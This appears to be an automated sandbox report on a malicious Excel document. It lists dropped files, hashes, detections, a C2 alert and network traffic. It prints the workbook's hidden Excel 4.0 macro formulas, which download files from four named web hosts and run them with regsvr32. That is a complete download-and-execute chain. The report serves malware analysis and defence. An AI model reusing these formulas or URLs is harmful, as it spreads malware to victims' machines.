                            SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            • Antivirus: Metadefender, Detection: 20%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):28672
                            Entropy (8bit):3.1569743079218417
                            Encrypted:false
                            SSDEEP:768:6kPWKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAHxKd:6XKpb8rGYrMPe3q7Q0XV5xtezEsi8/dK
                            MD5:12CE0FFD37F123D2F8492F28817265C3
                            SHA1:DF7C171FBB7B6AC05825D1C7ABC7DC60C4603D51
                            SHA-256:507A05F1A092B3CF006BE54D42D986ABF26164ACE6C2943D9832D59A8815A1AC
                            SHA-512:13CC319134AEE2BD12A6678D797EA381739790BBE3DD1E1A0E0BDA29630383F13855B280FAF62C5B8F1492C59EEC4FA64B6E3A932629B807409BAA5B106A66C7
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):303
                            Entropy (8bit):5.738319644141656
                            Encrypted:false
                            SSDEEP:6:7xHBO5YvsDCThKvfZ5WZAwT0JixqT/0IgAovhScJJuSXbWZF9L6Z2v3/n:IYkaQvf/Wfqr0dV5kSXbWpNn
                            MD5:F060C5E60952BD197257D1F9D53933AC
                            SHA1:3E1DB6C98E792C52180B50DA23289D5BABA491CB
                            SHA-256:D0BB818407875D5D5DE2320E94F9A4259AE09DD07AEE0BC3517200670ECECF52
                            SHA-512:51D6687A2A513DF5A22B510AC94DD9CB6F7D97D8502C6E192E81761DE8840016360B227328B28D60BAEF5130CC17760A7736A078F6245E554B039D83146C408E
                            Malicious:false
                            Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAilMIA%2BG6u6fOffdeloSSLftgvfHedjHZsx%2FnHB3u6bs5u%2F94PwbzL8h8iuQj5fU6ouxPvjTOMmxa%2BzRYyONLyaAb0hg9MOCCN3g2h1jkAF3E%3D000114.www.spinbalence.com/.9217.3608004736.31000734.3937766441.30996786.*.
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):233
                            Entropy (8bit):5.458604286084197
                            Encrypted:false
                            SSDEEP:6:7KH2jzcdWTKYffJKETQeitrYHgUXjOth4aESVlL06c/n:OH2jLTftUePUdESHD6n
                            MD5:5860E869AD5D3292E26FD527F3120E3A
                            SHA1:A547C6E62D97DFBF53E061DFA7695E7CE7406B2F
                            SHA-256:0347BBF9AF1F39621143CA495A9617F89A182AEE5A54A71282B1EB18A88C00D9
                            SHA-512:6AEB31452E95B4A05194ADD0047F95890FCDD0B726CDA712B285C90BF982A537127971F0642443912AC5981A1603774CFFBE4D8D96002D80890242743E66FC80
                            Malicious:false
                            Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hqQ6wpX78PX55d2aotWs5IA%3D000075.www.3d-stickers.com/.9729.3618004736.31000734.3945878115.30996786.*.
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):231
                            Entropy (8bit):5.5180081754315795
                            Encrypted:false
                            SSDEEP:6:7xHBO5YvsDCTh9HhVxUG9/6/DVh4gJJuSV09L6lH/n:IYkaJfly7V7kS42n
                            MD5:0C778372AE083EFCA2640D5CE8B5ABAC
                            SHA1:66E81472B754198F764726ADFAEAC6B179E2DBCA
                            SHA-256:A4F156650E92E15E94ED932B57C48D023CD41602EB5B408A73EC5D77451F6925
                            SHA-512:0202B8D386FC2D1EE34DC4EAFAF27C5C1039595FDD65C7E194330E0F5FFF7382E9474AF21E37357F3E0C0DF9FD7404BAA8876F8B5AC8B11092A7F6F7A820D97A
                            Malicious:false
                            Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAiRnV0TG5b0npswANceXA1cwrQZJXojk9hvRnyRY37Ivk%3D000075.www.spinbalence.com/.9729.3608004736.31000734.3932774008.30996786.*.
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):301
                            Entropy (8bit):5.6924231987102205
                            Encrypted:false
                            SSDEEP:6:7KH2jzcdWTKYffJKETQeiHMbCXJDw0a/PSUPFvca8ESXbWbnL8FUq/n:OH2jLTftUecgqUPP8ESXbWbnoFUon
                            MD5:5099D4482BDDF985ABAF86BA7B808466
                            SHA1:9FAE3D11E4CF94F58D631C2B57BE423B4E370A99
                            SHA-256:B41EF0F154947AC3741BBB23F88594A5542D00B27B449B4C8D299B477287A91C
                            SHA-512:7C5529EF35849BEF3053925106D7D6069390552A8E7461C87ACA6EAD6789150EEEB60E66F61AFF2863D2FED2B543F9C99D53AC0A683352026C42FC9F440A3BF2
                            Malicious:false
                            Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSdLdi59jw6GotzqA%2F%2BTveez7WUZj7S8ZwYcZXe6FVfsrOzQXtIeedQAsmUAviISLMDAANABHdlwwYRACr4DLkzU%3D000115.www.3d-stickers.com/.9217.3628004736.31000734.3952273981.30996786.*.
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):233
                            Entropy (8bit):5.48906588343199
                            Encrypted:false
                            SSDEEP:6:7KH2jzcdWTKYffJse3j6oLRMmmicPyhEOESgL3ddD2ic/n:OH2jLTfqeTD9nhdESg7dR2i6n
                            MD5:EE501A92AEFD9B58974229415DAA85F2
                            SHA1:6177154202892F12E1FE3F8A87766445B255A2E7
                            SHA-256:C0F9574BA2DCC4F298FB3F743AAD7FDBCA53F48EA2B8378D7FF7027C45E04CC4
                            SHA-512:E13F7BD9FFFD8C95CE79E2CF5F1E42D953A75AA7A01CC3177380F30AE8B9181C352B689F6F716843B937B70E92C257F602B41D353D5991492F1FF2BBA68524C4
                            Malicious:false
                            Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtmJfdpSnAaKPknzS3gL2v8c%3D000079.www.3d-stickers.com/.9728.3618004736.31000734.3940886227.30996786.*.
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                            Category:dropped
                            Size (bytes):221696
                            Entropy (8bit):7.123704337595423
                            Encrypted:false
                            SSDEEP:6144:EKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQmc:RbGUMVWlbc
                            MD5:E71BDD02C3D0754E802600DF8BF4CA71
                            SHA1:1B23F0CC4D900480EE409EDAAE3ECE48FEE2685C
                            SHA-256:77F55AF0AA76FD20853C07984463AA93FB7666C749DCBFFE85DBC610BC971BD3
                            SHA-512:E04983B87C2A155CDD8156FBD04699DCB14E037662BF9A30054FA692542B1D23BC777E0798C61A5EBD042F3FB3F695B67500727738371E760ACAAC77078E0FFB
                            Malicious:true
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=........................-.B.0...=.8.3.0.....................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..............
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):769024
                            Entropy (8bit):6.637885736387009
                            Encrypted:false
                            SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                            MD5:22CE6200C1714603F94B11F6DF41140F
                            SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                            SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                            SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            • Antivirus: Metadefender, Detection: 20%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\regsvr32.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):769024
                            Entropy (8bit):6.637885736387009
                            Encrypted:false
                            SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                            MD5:22CE6200C1714603F94B11F6DF41140F
                            SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                            SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                            SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            • Antivirus: Metadefender, Detection: 20%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................
                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                            Entropy (8bit):7.123491668947418
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:4470_02112022.xls
                            File size:221696
                            MD5:d3b182de8c99553a9f2b6d0f3f030a4f
                            SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
                            SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
                            SHA512:3abe78e4fca03e90d59818cded37a9feff6f7ade11cee1ef07c7ccd70cc4e250f7d835161409f0e8ba97cff4a678ef234298cb293ecac60e1ec0667a8904e484
                            SSDEEP:6144:WKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQm+:XbGUMVWlb+
                            TLSH:5A24F15B77999D6DF529C33408E7035AB233FD008F6B078B3649B395AFB48A05E13246
                            File Content Preview:........................>......................................................................................................................................................................................................................................
                            Icon Hash:e4eea286a4b4bcb4
                            Document Type:OLE
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:False
                            Code Page:1251
                            Author:
                            Last Saved By:
                            Create Time:2015-06-05 18:19:34
                            Last Saved Time:2022-11-02 06:43:53
                            Creating Application:
                            Security:0
                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Company:
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:1048576
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.3944713856337448
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e
                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e0 00 00 00
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.2780102568870367
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . Z x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                            General
                            Stream Path:Workbook
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:210174
                            Entropy:7.334559302852785
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 8 . . . . . . . X . @ . . .
                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            Name:Sheet6
                            Extraction:dynamic
                            Type:4
                            Final:False
                            Visible:False
                            Protected:False
                            12,6,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)",G16)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv1.ooccxx")",G18)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)",G20)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv2.ooccxx")",G22)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)",G24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv3.ooccxx")",G26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)",G28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv4.ooccxx")",G30)=FORMULA("=RETURN()",G36)
                            15,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)
                            17,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx")
                            19,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)
                            21,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx")
                            23,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)
                            25,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx")
                            27,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)
                            29,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx")
                            35,6,=RETURN()
                            Name:Sheet6, Macrosheet
                            Extraction:static
                            Type:unknown
                            Final:unknown
                            Visible:True
                            Protected:unknown
                            SHEET: Sheet6, Macrosheet
                            CELL:G13, =(((((((FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!F26)&'Sheet3'!R13)&'Sheet5'!E9)&'Sheet3'!M26,G16)=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!E9)&'Sheet1'!F24)&'Sheet1'!L31,G18))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!G28)&'Sheet3'!R13)&'Sheet5'!G15)&'Sheet3'!M26,G20))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!G15)&'Sheet1'!F24)&'Sheet1'!L31,G22))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!I27)&'Sheet3'!R13)&'Sheet5'!J3)&'Sheet3'!M26,G24))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!J3)&'Sheet1'!F24)&'Sheet1'!L31,G26))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!J29)&'Sheet3'!R13)&'Sheet5'!L12)&'Sheet3'!M26,G28))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!L12)&'Sheet1'!F24)&'Sheet1'!L31,G30))=FORMULA((('Sheet1'!L24&'Sheet1'!G44)&'Sheet1'!H46)&'Sheet1'!J44,G36), 0
                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            11/15/22-12:44:34.987459 | TCP | 2404328 | ET CNC Feodo Tracker Reported CnC Server TCP group 15 | 49180 | 443 | 192.168.2.22 | 218.38.121.17
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Nov 15, 2022 12:43:48.896744967 CET | 49173 | 80 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:48.924519062 CET | 80 | 49173 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:48.924680948 CET | 49173 | 80 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:48.924941063 CET | 49173 | 80 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.059000969 CET | 80 | 49173 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.175769091 CET | 80 | 49173 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.175973892 CET | 49173 | 80 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.197150946 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.197247028 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.197365046 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.206044912 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.206103086 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.312062025 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.312254906 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.321223974 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.321261883 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.321779013 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.321868896 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.604454994 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.604516983 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.711946011 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.712014914 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.712037086 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.712057114 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.712088108 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.712114096 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.750016928 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.750058889 CET | 443 | 49174 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.750092030 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.750108957 CET | 49174 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.751055956 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.751118898 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.751180887 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.751363039 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.751378059 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.814203024 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.814301968 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.822736025 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.822768927 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:49.853514910 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:49.853539944 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:50.169955015 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:50.170157909 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:50.170188904 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:50.170248032 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:50.198544025 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:50.198604107 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:50.198695898 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:50.198731899 CET | 443 | 49175 | 163.172.115.127 | 192.168.2.22
                            Nov 15, 2022 12:43:50.198852062 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:50.202442884 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:50.202486038 CET | 49175 | 443 | 192.168.2.22 | 163.172.115.127
                            Nov 15, 2022 12:43:50.356827021 CET | 49176 | 80 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.384488106 CET | 80 | 49176 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.384563923 CET | 49176 | 80 | 192.168.2.22 | 163.172.108.69
